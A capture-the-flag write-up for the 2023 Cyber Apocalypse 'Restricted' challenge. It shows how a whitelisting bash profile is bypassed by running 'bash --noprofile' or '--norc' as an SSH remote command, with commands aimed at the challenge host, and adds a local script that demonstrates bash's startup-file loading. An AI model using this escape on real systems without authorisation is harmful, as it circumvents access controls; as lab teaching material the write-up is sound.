2023 Cyber Apocalypse: Restricted

Challenge Information

| Attribute | Details |
| --- | --- |
| Event | 2023 Cyber Apocalypse |
| Category | Misc |
| Challenge | Restricted |

Summary

This challenge involves connecting to a restricted SSH environment with limited command capabilities. The restriction is enforced through a custom bash profile that whitelists only certain commands. By bypassing the profile using SSH options, we can execute arbitrary bash commands and access the flag.


Analysis

The challenge setup includes:

  • SSH server with restricted user account
  • Custom .bashrc or .bash_profile that limits available commands
  • Flag stored in a protected directory

Vulnerability: SSH allows specifying a remote command that bypasses the interactive shell profile. Additionally, the -t flag forces pseudo-terminal allocation while allowing command execution.

Solution approach:

ssh -t restricted@target -p port "bash --noprofile"

The flags:

  • -t: Force pseudo-terminal allocation (overrides NoTTY restrictions)
  • bash --noprofile: Runs bash without loading profile restrictions
  • bash --norc: Runs bash without loading rc files

Solution

Step 1: Connect with SSH

ssh -X restricted@159.65.94.38 -p 32573 -t "bash --noprofile"

Step 2: Navigate to flag location

cd flag_8dpsy

Step 3: Read the flag

cat flag_8dpsy

Alternative approach, using --norc instead of --noprofile:

ssh -X restricted@159.65.94.38 -p 32573 -t "bash --norc"

Why this works:

  • --noprofile prevents loading /etc/profile, ~/.bash_profile, ~/.bash_login, ~/.profile
  • --norc prevents loading ~/.bashrc
  • -t forces a pseudo-terminal, bypassing TTY checks
  • This gives full shell access despite profile restrictions
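
The startup-file behaviour these points rely on can be checked locally. The script below is an added example, not part of the original write-up: it runs bash in each invocation mode against a throwaway HOME and reports which startup files were sourced. The function name startup_probe, the LOADED marker variable and the two constructed startup files are assumptions made for the demonstration.

```shell
#!/usr/bin/env bash
# Which startup files does bash read in each invocation mode?
# Everything runs in a scratch HOME; the two files written below are
# constructed stand-ins for a restricting profile and only record that they ran.

# startup_probe ARGS... : run `bash ARGS -c ...` with a scratch HOME and
# print "loaded: <files>" for the constructed startup files that were sourced.
startup_probe() {
    probe_home=$(mktemp -d) || return 1
    printf '%s\n' 'LOADED="${LOADED:+$LOADED,}profile"' > "$probe_home/.bash_profile"
    printf '%s\n' 'LOADED="${LOADED:+$LOADED,}bashrc"'  > "$probe_home/.bashrc"
    # env -i gives a clean environment; stdin comes from /dev/null so bash
    # does not treat the probe as a shell started over a network connection.
    # tail keeps only our line in case a system-wide startup file prints.
    probe_out=$(env -i HOME="$probe_home" PATH="$PATH" \
        bash "$@" -c 'echo "loaded: ${LOADED:-none}"' </dev/null 2>/dev/null \
        | tail -n 1)
    rm -rf "$probe_home"
    printf '%s\n' "$probe_out"
}

# Print the matrix. The plain `-c` row is how sshd starts the login shell
# when a remote command is supplied: non-login and non-interactive.
for mode in "-l" "-i" "" "--noprofile -l" "--norc -i"; do
    # Word splitting of $mode is intended here.
    printf '%-24s %s\n' "bash $mode -c" "$(startup_probe $mode)"
done
```

Any restriction that exists only in ~/.bash_profile or ~/.bashrc is absent in every row that reports "none", which is why such files cannot serve as the enforcement point for a restricted account.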

Key Takeaways

  • Bash profile files (.bashrc, .bash_profile) enforce restrictions
  • SSH command execution can bypass interactive shell restrictions
  • The --noprofile and --norc flags disable profile loading
  • TTY allocation can be forced with -t flag
  • Restricted shells can often be escaped by understanding how they work
  • Security through shell restrictions is weak without proper system-level controls
  • Understanding shell startup sequences is crucial for escape techniques